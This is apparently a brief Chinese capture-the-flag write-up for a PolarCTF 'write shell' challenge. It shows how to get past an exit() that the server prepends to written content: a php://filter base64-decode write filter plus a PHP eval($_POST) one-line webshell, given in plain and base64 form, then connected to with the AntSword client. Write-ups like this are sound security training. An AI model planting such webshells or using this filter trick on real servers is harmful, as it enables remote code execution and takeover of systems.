Polarctf 写shell

代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,

使用base64的话

<?php eval($_POST['a']);

Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7

需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php

写入成功后用蚁剑连接

相关推荐
数字供应链安全产品选型8 小时前
关键领域清单+SBOM:834号令下软件供应链的“精准治理“逻辑与技术落地路径
人工智能·安全
byoass13 小时前
企业云盘与设计软件深度集成:AutoCAD/Revit/SolidWorks插件开发与API集成实战
服务器·网络·数据库·安全·oracle·云计算
Fullde福德负载箱厂家14 小时前
负载箱的需求分析与规格编制:用户应知的采购前期技术准备
安全·制造
ReaF_star14 小时前
【安全】SSL证书更新操作手册(Nginx+Cloudflare+acme.sh)
nginx·安全·ssl
vortex514 小时前
python 库劫持:原理、利用与防御
python·网络安全·提权
盟接之桥15 小时前
什么是EDI(电子数据交换)|制造业场景解决方案
大数据·网络·安全·汽车·制造
qq_三哥啊15 小时前
【mitmproxy】通过 mitmproxy 的本地捕获代理模式获取 OpenCode 发起的 AI API 请求的详细信息
网络·系统安全·代理模式
捉鸭子15 小时前
某音a_bogus vmp逆向
爬虫·python·web安全·node.js·js
科技云报道15 小时前
安全进入“AI自主攻击”时代,瑞数信息如何用AI对抗AI
人工智能·安全
菩提小狗16 小时前
每日安全情报报告 · 2026-05-01
网络安全·漏洞·cve·安全情报·每日安全